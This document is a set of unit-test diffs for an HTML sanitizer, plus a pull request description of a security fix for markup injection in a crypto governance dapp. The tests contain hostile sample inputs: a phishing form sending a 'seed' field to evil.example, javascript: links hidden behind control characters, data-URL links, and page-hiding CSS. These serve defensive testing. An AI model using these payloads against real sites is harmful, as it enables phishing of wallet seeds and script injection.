+    const element = await renderEntry(
+      '<form action="https://evil.example/"><input name="seed"><button>Claim</button></form>'
+    );
+
+    expect(element.querySelectorAll("form").length).toBe(0);
+    expect(element.querySelectorAll("input").length).toBe(0);
+    expect(element.querySelectorAll("button").length).toBe(0);
+  });
+
+  it("should not render an svg or an image", async () => {
+    const element = await renderEntry(
+      '<svg width="10" height="10"><rect width="10" height="10" /></svg>' +
+        '<img src="data:image/svg+xml;base64,PHN2Zz48L3N2Zz4=" alt="logo">' +
+        "Topic"
+    );
+
+    expect(element.querySelectorAll("svg").length).toBe(0);
+    expect(element.querySelectorAll("img").length).toBe(0);
+    expect(element.textContent).toContain("Topic");
+  });
+
+  it("should not render the classes of the app", async () => {
+    const element = await renderEntry(
+      '<p class="content-cell-island" id="fake" data-tid="proposal-summary-component">Topic</p>'
+    );
+
+    expect(element.querySelectorAll(".content-cell-island").length).toBe(0);
+    expect(element.querySelectorAll("#fake").length).toBe(0);
+    expect(
+      element.querySelectorAll('[data-tid="proposal-summary-component"]').length
+    ).toBe(0);
+    expect(element.textContent).toContain("Topic");
+  });
+});

--- a/frontend/src/tests/lib/utils/html.utils.spec.ts
+++ b/frontend/src/tests/lib/utils/html.utils.spec.ts
@@ -168,6 +168,12 @@ describe("html.utils", () => {
       );
     });
 
+    it("should drop an attribute named after a property of Object", () => {
+      expect(
+        sanitize('<p constructor="x" __proto__="y" hasOwnProperty="z">t</p>')
+      ).toBe("<p>t</p>");
+    });
+
     it("should not change an already sanitized tree", () => {
       const html =
         '<p>a <a href="https://internetcomputer.org/" target="_blank" rel="noopener noreferrer">l</a></p>';

--- a/frontend/src/tests/lib/utils/html.utils.spec.ts
+++ b/frontend/src/tests/lib/utils/html.utils.spec.ts
@@ -195,6 +195,36 @@ describe("html.utils", () => {
       disconnect();
     });
 
+    it("should stop changing a link that already opens a new tab", async () => {
+      // setAttribute reports a mutation even when the value stays the same, so
+      // a sanitizer that always writes `rel` never settles.
+      const root = document.createElement("div");
+      document.body.appendChild(root);
+
+      let mutations = 0;
+      const counter = new MutationObserver((records) => {
+        mutations += records.length;
+      });
+
+      const disconnect = observeRenderedMarkdown(root);
+      counter.observe(root, {
+        attributes: true,
+        childList: true,
+        subtree: true,
+      });
+
+      root.innerHTML =
+        '<a href="https://internetcomputer.org/" target="_blank">link</a>';
+      for (let index = 0; index < 30; index++) {
+        await Promise.resolve();
+      }
+
+      disconnect();
+      counter.disconnect();
+
+      expect(mutations).toBeLessThan(5);
+    });
+
     it("should stop sanitizing once disconnected", async () => {
       const root = document.createElement("div");
       document.body.appendChild(root);

--- a/frontend/src/tests/lib/utils/html.utils.spec.ts
+++ b/frontend/src/tests/lib/utils/html.utils.spec.ts
@@ -139,6 +139,33 @@ describe("html.utils", () => {
       );
     });
 
+    it("should drop a link that hides an unsafe scheme behind a control character", () => {
+      // The HTML parser turns a control character of an attribute into a
+      // replacement character, so the value is set on the element directly.
+      const sanitizeHref = (href: string): string | null => {
+        const root = document.createElement("div");
+        const link = document.createElement("a");
+        link.setAttribute("href", href);
+        link.textContent = "x";
+        root.appendChild(link);
+        sanitizeRenderedMarkdown(root);
+        return root.querySelector("a")?.getAttribute("href") ?? null;
+      };
+
+      // Every value below resolves to the `javascript` scheme in the URL
+      // parser of the browser.
+      expect(sanitizeHref("java\tscript:alert(1)")).toBeNull();
+      expect(sanitizeHref("java\nscript:alert(1)")).toBeNull();
+      expect(sanitizeHref("java\rscript:alert(1)")).toBeNull();
+      expect(sanitizeHref("\u0000javascript:alert(1)")).toBeNull();
+      expect(sanitizeHref(" javascript:alert(1)")).toBeNull();
+
+      expect(sanitizeHref("https://internetcomputer.org/")).toBe(
+        "https://internetcomputer.org/"
+      );
+      expect(sanitizeHref("/proposal/1")).toBe("/proposal/1");
+    });
+
     it("should drop the attributes that imitate the app", () => {
       expect(
         sanitize(

--- a/frontend/src/tests/lib/utils/html.utils.spec.ts
+++ b/frontend/src/tests/lib/utils/html.utils.spec.ts
@@ -1,0 +1,204 @@
+import {
+  observeRenderedMarkdown,
+  sanitizeRenderedMarkdown,
+} from "$lib/utils/html.utils";
+
+describe("html.utils", () => {
+  const sanitize = (html: string): string => {
+    const root = document.createElement("div");
+    root.innerHTML = html;
+    sanitizeRenderedMarkdown(root);
+    return root.innerHTML;
+  };
+
+  describe("sanitizeRenderedMarkdown", () => {
+    it("should keep the tags that markdown produces", () => {
+      expect(
+        sanitize(
+          "<h1>Title</h1><p>Text with <strong>bold</strong> and <em>italic</em>.</p>"
+        )
+      ).toBe(
+        "<h1>Title</h1><p>Text with <strong>bold</strong> and <em>italic</em>.</p>"
+      );
+      expect(sanitize("<ul><li>one</li><li>two</li></ul>")).toBe(
+        "<ul><li>one</li><li>two</li></ul>"
+      );
+      expect(sanitize("<blockquote><p>quote</p></blockquote>")).toBe(
+        "<blockquote><p>quote</p></blockquote>"
+      );
+      expect(sanitize("<pre><code>let a = 1;</code></pre>")).toBe(
+        "<pre><code>let a = 1;</code></pre>"
+      );
+      expect(sanitize("<p>a<br>b</p><hr>")).toBe("<p>a<br>b</p><hr>");
+      expect(sanitize("<p><u>underlined</u> and <del>removed</del></p>")).toBe(
+        "<p><u>underlined</u> and <del>removed</del></p>"
+      );
+    });
+
+    it("should keep a table with its cell attributes", () => {
+      expect(
+        sanitize(
+          '<table><thead><tr><th align="center">h</th></tr></thead>' +
+            '<tbody><tr><td colspan="2" rowspan="3">c</td></tr></tbody></table>'
+        )
+      ).toBe(
+        '<table><thead><tr><th align="center">h</th></tr></thead>' +
+          '<tbody><tr><td colspan="2" rowspan="3">c</td></tr></tbody></table>'
+      );
+    });
+
+    it("should keep the language class of a code block", () => {
+      expect(sanitize('<code class="language-candid">x</code>')).toBe(
+        '<code class="language-candid">x</code>'
+      );
+    });
+
+    it("should keep the start of an ordered list", () => {
+      expect(sanitize('<ol start="2"><li>two</li></ol>')).toBe(
+        '<ol start="2"><li>two</li></ol>'
+      );
+    });
+
+    it("should keep a link and force rel on a new tab", () => {
+      expect(sanitize('<a href="https://internetcomputer.org/">link</a>')).toBe(
+        '<a href="https://internetcomputer.org/">link</a>'
+      );
+      expect(
+        sanitize(
+          '<a href="https://internetcomputer.org/" target="_blank">link</a>'
+        )
+      ).toBe(
+        '<a href="https://internetcomputer.org/" target="_blank" rel="noopener noreferrer">link</a>'
+      );
+    });
+
+    it("should replace a rel that opens the tab", () => {
+      expect(
+        sanitize(
+          '<a href="https://evil.example/" target="_blank" rel="opener">l</a>'
+        )
+      ).toBe(
+        '<a href="https://evil.example/" target="_blank" rel="noopener noreferrer">l</a>'
+      );
+    });
+
+    it("should drop a style element and its content", () => {
+      expect(
+        sanitize("<div><style>body{display:none}</style>Hello</div>")
+      ).toBe("Hello");
+      expect(
+        sanitize("<p>a</p><style>:root{--primary:red}</style><p>b</p>")
+      ).toBe("<p>a</p><p>b</p>");
+    });
+
+    it("should drop the style attribute", () => {
+      expect(
+        sanitize(
+          '<p style="position:fixed;top:0;left:0;width:100vw;height:100vh;background:red">x</p>'
+        )
+      ).toBe("<p>x</p>");
+      expect(
+        sanitize('<table style="min-width: 50px"><tr><td>c</td></tr></table>')
+      ).toBe("<table><tbody><tr><td>c</td></tr></tbody></table>");
+    });
+
+    it("should drop a form and its input fields", () => {
+      expect(
+        sanitize(
+          '<form action="https://evil.example/"><input name="seed"><button>Claim</button></form>'
+        )
+      ).toBe("Claim");
+    });
+
+    it("should drop an svg", () => {
+      expect(
+        sanitize(
+          '<p>before</p><svg width="100" height="100"><rect width="100" height="100" fill="red"></rect></svg><p>after</p>'
+        )
+      ).toBe("<p>before</p><p>after</p>");
+    });
+
+    it("should drop an image with a data url", () => {
+      expect(
+        sanitize(
+          '<img src="data:image/svg+xml;base64,PHN2Zz48L3N2Zz4=" alt="a">'
+        )
+      ).toBe("");
+      expect(sanitize('<p>a<img src="https://evil.example/x.png">b</p>')).toBe(
+        "<p>ab</p>"
+      );
+    });
+
+    it("should drop a link with an unsafe scheme", () => {
+      expect(sanitize('<a href="javascript:alert(1)">x</a>')).toBe("<a>x</a>");
+      expect(
+        sanitize('<a href="data:text/html;base64,PHA+eDwvcD4=">x</a>')
+      ).toBe("<a>x</a>");
+      expect(sanitize('<a href="/proposal/1">x</a>')).toBe(
+        '<a href="/proposal/1">x</a>'
+      );
+    });
+
+    it("should drop the attributes that imitate the app", () => {
+      expect(
+        sanitize(
+          '<p id="app" class="content-cell-island" data-tid="proposal-summary-component">x</p>'
+        )
+      ).toBe("<p>x</p>");
+    });
+
+    it("should drop embedded and interactive elements", () => {
+      expect(sanitize('<iframe src="https://evil.example/"></iframe>')).toBe(
+        ""
+      );
+      expect(sanitize('<object data="https://evil.example/"></object>')).toBe(
+        ""
+      );
+      expect(sanitize("<dialog open>fake modal</dialog>")).toBe("fake modal");
+      expect(sanitize("<textarea>x</textarea>")).toBe("x");
+      expect(sanitize("<select><option>x</option></select>")).toBe("x");
+      expect(sanitize('<video src="x" controls></video>')).toBe("");
+      expect(sanitize("<marquee>x</marquee>")).toBe("x");
+    });
+
+    it("should keep the text of an unknown element", () => {
+      expect(sanitize("<div>kept text</div>")).toBe("kept text");
+      expect(sanitize('<span class="x">kept <b>text</b></span>')).toBe(
+        "kept <b>text</b>"
+      );
+    });
+
+    it("should not change an already sanitized tree", () => {
+      const html =
+        '<p>a <a href="https://internetcomputer.org/" target="_blank" rel="noopener noreferrer">l</a></p>';
+      expect(sanitize(html)).toBe(html);
+    });
+  });
+
+  describe("observeRenderedMarkdown", () => {
+    it("should sanitize content that is added later", async () => {
+      const root = document.createElement("div");
+      document.body.appendChild(root);
+      const disconnect = observeRenderedMarkdown(root);
+
+      root.innerHTML = "<div><style>body{display:none}</style>Hello</div>";
+      await Promise.resolve();
+
+      expect(root.innerHTML).toBe("Hello");
+
+      disconnect();
+    });
+
+    it("should stop sanitizing once disconnected", async () => {
+      const root = document.createElement("div");
+      document.body.appendChild(root);
+      const disconnect = observeRenderedMarkdown(root);
+      disconnect();
+
+      root.innerHTML = "<form>Claim</form>";
+      await Promise.resolve();
+
+      expect(root.innerHTML).toBe("<form>Claim</form>");
+    });
+  });
+});


### PR DESCRIPTION
# Motivation

A proposal summary and an SNS topic or proposal type description render attacker-authored markdown and HTML through gix-components, sanitized only with DOMPurify's default config. That config keeps `<style>`, `<form>`, `<img>`, and the `style`, `class`, and `id` attributes, so a malicious proposal or SNS function description can inject page-wide CSS and fake UI elements that an authenticated user trusts.

# Changes

- Added `sanitizeRenderedMarkdown` and `observeRenderedMarkdown` in `html.utils.ts`, walking rendered DOM nodes against an explicit tag and attribute allow-list.
- Applied the sanitizer to `ProposalSummary.svelte`, so an NNS or SNS proposal summary can no longer inject markup or CSS.
- Applied the same sanitizer to `ProposalSystemInfoEntry.svelte`, so an SNS topic or proposal type description can no longer inject markup.
- Rebuilt the proposal payload image in `TreeJsonValue.svelte` with a Svelte `<img>` element instead of a string passed to gix's `Html` component, closing a third injection path through the key and value attributes.
- Fixed `isSafeHref` to strip control characters and whitespace before the scheme check, closing a latent bypass where a control character hid an unsafe scheme.
- Added unit tests for the sanitizer and the three fixed components, plus an e2e spec that injects markup into a real proposal summary.

# Tests

Unit suite passes: 677 files, 5947 tests. Each fix is a proven regression test: reverting the product file makes the matching spec fail, restoring it makes it pass again. Fetched every live NNS proposal (6399 summaries) and every SNS topic and function description (1670 strings) and replayed them through the sanitizer: no real content changes except one proposal table losing an unused `min-width` style. Added an e2e spec, `proposal-summary-injection.spec.ts`, that creates a real proposal with injected markup and checks the rendered page; it could not run locally because the local replica had no snsdemo state.

# Todos

- [x] Accessibility (a11y) – no impact. Legitimate content renders unchanged.
- [x] Changelog – added, under Application / Security in `CHANGELOG-Nns-Dapp-unreleased.md`.
